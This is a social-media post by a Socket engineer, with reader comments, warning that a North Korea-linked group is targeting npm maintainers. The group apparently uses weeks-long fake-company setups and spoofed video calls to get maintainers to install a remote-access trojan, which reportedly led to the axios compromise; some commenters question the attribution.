North Korea is targeting npm maintainers -- not for crypto, but for write access to packages downloaded trillions of times a year. Several Socket engineers were targeted in this campaign -- myself, Jordan Harband, John-David D., and others. None of us fell for the bait. Unfortunately, the axios maintainer did. No shame in that -- these aren't phishing emails. They're weeks-long ops with fake companies, fake Slack workspaces, and spoofed meeting platforms built with realistic Zoom/Teams interfaces using the official SDKs for realism. Other confirmed targets: Matteo Collina (Fastify, Pino, Undici, Node.js TSC Chair), Wesley Todd (Express TC), Pelle Wessman (mocha, neostandard). The common thread? High-trust maintainers with publish access to packages that sit deep in everyone's dependency tree. The attack chain: build rapport over weeks, schedule a video call, fake an audio error, prompt the target to install a "fix." That fix is a RAT. Once it's on your machine, they have your .npmrc tokens, browser sessions, AWS creds, keychain. 2FA doesn't matter. OIDC publishing doesn't matter. Game over. Security researcher @tayvano_ linked this to UNC1069, a DPRK-nexus group Mandiant has tracked since 2018. Their reasoning is brutal in its simplicity: why social engineer one rich person when you can compromise one maintainer and reach millions of machines? This is the threat model now. If you maintain popular packages, act accordingly. If you use open source (and you certainly do), act accordingly. Full writeup: https://lnkd.in/dsjmBcvg
They tried getting me too. Fortunately, the Slack connection request was a red flag because it's never happened to me without a prior conversation.
the part that should worry every security team is that 2FA and OIDC publishing are both irrelevant once the maintainers machine is compromised. the entire npm trust model assumes the human behind the credentials is legitimate. theres no behavioral signal that flags when a trusted publisher suddenly pushes a version with a post-install binary download after 200 releases of pure JS. we audited our own dependency tree after the axios incident and found 4 packages where the sole maintainer has no succession plan. if that person gets compromised the blast radius is our entire CI pipeline
They tried getting me too. Fortunately, the Slack connection request was a red flag because it's never happened to me without a prior conversation.
Prilvesh K
1d
Offloading every event as North Koreans sounds cool but reality is there are alot more groups from around the world from just about every country you can think off . Unless you have IP Logs or Geo data factual proof you cant say that this attempts are by Korea . Realistically speaking there are African groups , North American brazil , columbia , Philiphines ,chinese ,indians and lot more groups . but you hardly see there names being in media despite ones server logs showing there attempts, One needs to wonder why is that ?
Do we have any proof that it's North Korea and not CIA, or intelligence from other countries?